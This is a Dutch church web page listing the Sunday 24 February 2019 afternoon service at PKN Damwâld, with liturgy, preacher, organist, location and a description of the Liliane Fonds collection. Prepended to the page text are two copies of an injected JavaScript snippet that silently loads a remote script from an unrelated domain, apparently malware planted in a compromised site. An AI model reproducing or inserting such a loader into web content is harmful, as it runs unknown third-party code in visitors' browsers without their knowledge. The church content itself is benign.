;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 24 februari 2019 14:00 uur - PKN Damwâld
zondag 24 februari 2019
14:00 uur

Kerkdienst zondag 24 februari 2019 14:00 uur

Informatie

Voorganger:Dhr. L. Blees, Walterswald
Organist:Jelte Cuperus
Liturgie
lied voor de dienst Elb 409
welkom
intochtslied Elb 351
Stil gebed, votum en groet
We zingen: Psalm 42 : 1 en 3
Geloofsbelijdenis .
We zingen: Psalm 25 : 1 en 7
Gebed
We lezen: Daniël 6
We zingen: Psalm 34 : 4 en 9
Preek .
We zingen: Elb 313 : 1, 2 en 3
Gebed
Collecte
We zingen: Gezang 231 : 1, 2, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Liliane Fonds

Het Liliane Fonds wil bijdragen aan een wereld die openstaat voor iedereen en waarin ook kinderen met een handicap die opgroeien in extreme armoede, al hun talenten kunnen ontwikkelen en inzetten. Samen met lokale organisaties in Afrika, Azië en Latijns-Amerika maken ze kinderen sterker en hun omgeving toegankelijker. Het werk van het Liliane Fonds concentreert zich in 30 landen. In elk van deze landen hebben ze een partnerschap met een organisatie ter plekke. Deze Strategische Partnerorganisatie (SPO) maakt jaarlijks een programma voor ondersteuning van kinderen met een handicap. Een SPO kent het land door en door en kan bepalen waar en op welke gebieden steun het dringendst nodig is. Voor uitvoering van het programma maakt de SPO afspraken met lokale organisaties die dichtbij de kinderen werken, bijvoorbeeld op het platteland of in sloppenwijken. Binnen deze Partnerorganisaties (PO's) regelt een team waarin verschillende deskundigheden vertegenwoordigd zijn - het mediation team - steun op maat voor kinderen. Het Liliane Fonds steunt het programma inhoudelijk en financieel.

Tweede collecte: Kerk
Uitganscollecte: Kerk